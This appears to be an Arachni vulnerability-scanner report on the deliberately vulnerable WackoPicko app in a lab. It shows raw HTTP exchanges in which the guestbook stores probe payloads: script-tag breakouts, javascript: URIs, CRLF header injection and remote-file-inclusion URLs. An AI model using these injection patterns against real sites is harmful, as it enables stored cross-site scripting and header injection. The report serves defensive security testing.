";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name" /><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit" /> </form> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Raw HTTP request used to retrieve the page.
POST /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 76 Content-Type: application/x-www-form-urlencoded comment=1&name=arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:02 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1078
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
cookie
input
PHPSESSID
using
GET
at
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12
pointing to
http://192.168.0.26/WackoPicko/guestbook/
.
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 | http://192.168.0.26/WackoPicko/guestbook/ |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72%2528%2529%2522%2526%25251%2527-%253B%253Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%252F%253E%2527
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:04 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=omn1osdrp0bnijli75pak99m82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1801
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
<p class="comment">1</p>
<p> - by arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/> </p>
<p class="comment">1</p>
<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
<p class="comment">1</p>
<p> - by arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>' </p>
<p class="comment">1</p>
<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
<p> - by arachni_name </p>
<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
<p> - by arachni_name </p>
<p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p>
<p> - by arachni_name </p>
<p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
<p> - by arachni_name </p>
<p class="comment">1'"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name]]]]]]]]] </p>
<p class="comment">1<!--</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name#^($!@$)(()))****** </p>
<p class="comment">1</p>
<p> - by arachni_name'" </p>
<p class="comment">1</p>
<p> - by arachni_name<!-- </p>
<p class="comment">1#^($!@$)(()))******</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1]]]]]]]]]</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.
To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.
Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.
